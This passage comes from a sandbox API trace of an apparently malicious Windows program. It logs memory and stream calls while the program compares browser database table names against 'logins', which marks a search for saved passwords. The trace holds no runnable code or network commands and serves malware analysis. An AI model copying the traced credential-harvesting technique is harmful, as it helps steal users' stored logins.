libNewSize=0x52da1f) returned 0x0 [0590.133] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.133] LocalAlloc (uFlags=0x40, uBytes=0x1a0) returned 0x2f09968 [0590.133] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x2d, cb=0x0, dwLockType=0x0) returned 0x0 [0590.134] IStream:SetSize (This=0x5ec250, libNewSize=0x2f09968) returned 0x0 [0590.134] LocalAlloc (uFlags=0x40, uBytes=0x1a8) returned 0x2f09b10 [0590.134] LocalFree (hMem=0x2f09968) returned 0x0 [0590.134] LocalFree (hMem=0x570078) returned 0x0 [0590.134] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.134] lstrcmpiA (lpString1="server_addresses", lpString2="logins") returned 1 [0590.134] LocalFree (hMem=0x58d970) returned 0x0 [0590.134] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.134] LocalFree (hMem=0x56ff38) returned 0x0 [0590.134] LocalFree (hMem=0x58d548) returned 0x0 [0590.134] LocalFree (hMem=0x2f09b10) returned 0x0 [0590.134] LocalFree (hMem=0x56fe98) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0xb317, cb=0x0, dwLockType=0x0) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0xb317, cb=0x0, dwLockType=0x0) returned 0x0 [0590.134] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0xb318, cb=0x0, dwLockType=0x0) returned 0x0 [0590.134] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0xb319, cb=0x0, dwLockType=0x0) returned 0x0 [0590.134] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.134] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.134] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.134] IStream:LockRegion (This=0x57ea78, libOffset=0xb31a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.134] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.134] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.134] LocalFree (hMem=0x2f09968) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.134] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.134] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56fe98 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.134] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.134] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.134] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.134] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.135] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.135] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.135] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.135] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0590.135] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.135] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.135] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.135] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.135] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.135] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.135] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1978 [0590.135] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.135] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x23, cb=0x0, dwLockType=0x0) returned 0x0 [0590.135] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.135] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1a20 [0590.135] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x3a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.135] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.135] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.135] LocalAlloc (uFlags=0x40, uBytes=0x12f) returned 0x5d5128 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.135] IStream:LockRegion (This=0x5ec250, libOffset=0x3b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.135] IStream:SetSize (This=0x5ec250, libNewSize=0x5d5128) returned 0x0 [0590.135] LocalAlloc (uFlags=0x40, uBytes=0x137) returned 0x56b778 [0590.135] LocalFree (hMem=0x5d5128) returned 0x0 [0590.135] LocalFree (hMem=0x56fe98) returned 0x0 [0590.135] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.135] lstrcmpiA (lpString1="server_address_metadata", lpString2="logins") returned 1 [0590.135] LocalFree (hMem=0x58d548) returned 0x0 [0590.135] LocalFree (hMem=0x5d1978) returned 0x0 [0590.135] LocalFree (hMem=0x5d1a20) returned 0x0 [0590.135] LocalFree (hMem=0x58d970) returned 0x0 [0590.135] LocalFree (hMem=0x56b778) returned 0x0 [0590.135] LocalFree (hMem=0x56ff38) returned 0x0 [0590.135] IStream:LockRegion (This=0x57ea78, libOffset=0xb22d, cb=0x0, dwLockType=0x0) returned 0x0 [0590.135] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.135] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.135] IStream:LockRegion (This=0x57ea78, libOffset=0xb22d, cb=0x0, dwLockType=0x0) returned 0x0 [0590.135] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.135] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.135] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.135] IStream:LockRegion (This=0x57ea78, libOffset=0xb22e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.136] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.136] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.136] IStream:LockRegion (This=0x57ea78, libOffset=0xb22f, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.136] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.136] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.136] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.136] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.136] IStream:LockRegion (This=0x57ea78, libOffset=0xb230, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.136] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.136] LocalFree (hMem=0x2f09968) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.136] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.136] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0590.136] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.136] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.136] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.136] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x56ffd8 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.136] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.136] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.136] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0x5d1a20 [0590.137] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.137] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x56ffd8 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x22, cb=0x0, dwLockType=0x0) returned 0x0 [0590.137] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.137] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0x5d1978 [0590.137] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x38, cb=0x0, dwLockType=0x0) returned 0x0 [0590.137] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.137] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.137] LocalAlloc (uFlags=0x40, uBytes=0xd9) returned 0x2ed0148 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x39, cb=0x0, dwLockType=0x0) returned 0x0 [0590.137] IStream:SetSize (This=0x5ec250, libNewSize=0x2ed0148) returned 0x0 [0590.137] LocalAlloc (uFlags=0x40, uBytes=0xe1) returned 0x2ed2060 [0590.137] LocalFree (hMem=0x2ed0148) returned 0x0 [0590.137] LocalFree (hMem=0x56ff38) returned 0x0 [0590.137] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.137] lstrcmpiA (lpString1="autofill_sync_metadata", lpString2="logins") returned -1 [0590.137] LocalFree (hMem=0x58d970) returned 0x0 [0590.137] LocalFree (hMem=0x5d1a20) returned 0x0 [0590.137] LocalFree (hMem=0x5d1978) returned 0x0 [0590.137] LocalFree (hMem=0x58d548) returned 0x0 [0590.137] LocalFree (hMem=0x2ed2060) returned 0x0 [0590.137] LocalFree (hMem=0x56fe98) returned 0x0 [0590.137] IStream:LockRegion (This=0x57ea78, libOffset=0xb2c2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.137] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.137] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.137] IStream:LockRegion (This=0x57ea78, libOffset=0xb2c2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.137] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.137] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.137] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.137] IStream:LockRegion (This=0x57ea78, libOffset=0xb2c3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.137] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.137] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.137] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.137] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.137] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.137] IStream:LockRegion (This=0x57ea78, libOffset=0xb2c4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.137] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.137] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.137] LocalFree (hMem=0x2f09968) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.137] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.137] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.137] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.137] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.138] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.138] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.138] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.138] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.138] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0590.138] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.138] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.138] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.138] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.138] LocalAlloc (uFlags=0x40, uBytes=0xa9) returned 0x2ed5118 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.138] IStream:SetSize (This=0x5ec250, libNewSize=0x2ed5118) returned 0x0 [0590.138] LocalAlloc (uFlags=0x40, uBytes=0xb1) returned 0x2ed72a0 [0590.138] LocalFree (hMem=0x2ed5118) returned 0x0 [0590.138] LocalAlloc (uFlags=0x40, uBytes=0x96) returned 0x56ffd8 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x34, cb=0x0, dwLockType=0x0) returned 0x0 [0590.138] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.138] LocalAlloc (uFlags=0x40, uBytes=0x9e) returned 0x5d1978 [0590.138] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.138] IStream:LockRegion (This=0x5ec250, libOffset=0x4a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.138] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.138] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.138] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.138] LocalFree (hMem=0x56fe98) returned 0x0 [0590.138] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.138] lstrcmpiA (lpString1="autofill_sync_metadata", lpString2="logins") returned -1 [0590.138] LocalFree (hMem=0x58d548) returned 0x0 [0590.138] LocalFree (hMem=0x2ed72a0) returned 0x0 [0590.138] LocalFree (hMem=0x5d1978) returned 0x0 [0590.138] LocalFree (hMem=0x58d970) returned 0x0 [0590.138] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.138] LocalFree (hMem=0x56ff38) returned 0x0 [0590.138] IStream:LockRegion (This=0x57ea78, libOffset=0xb1a0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.138] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.138] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.138] IStream:LockRegion (This=0x57ea78, libOffset=0xb1a0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.138] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.138] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.138] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.138] IStream:LockRegion (This=0x57ea78, libOffset=0xb1a1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.138] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.138] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.138] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.138] IStream:LockRegion (This=0x57ea78, libOffset=0xb1a2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.139] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.139] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.139] 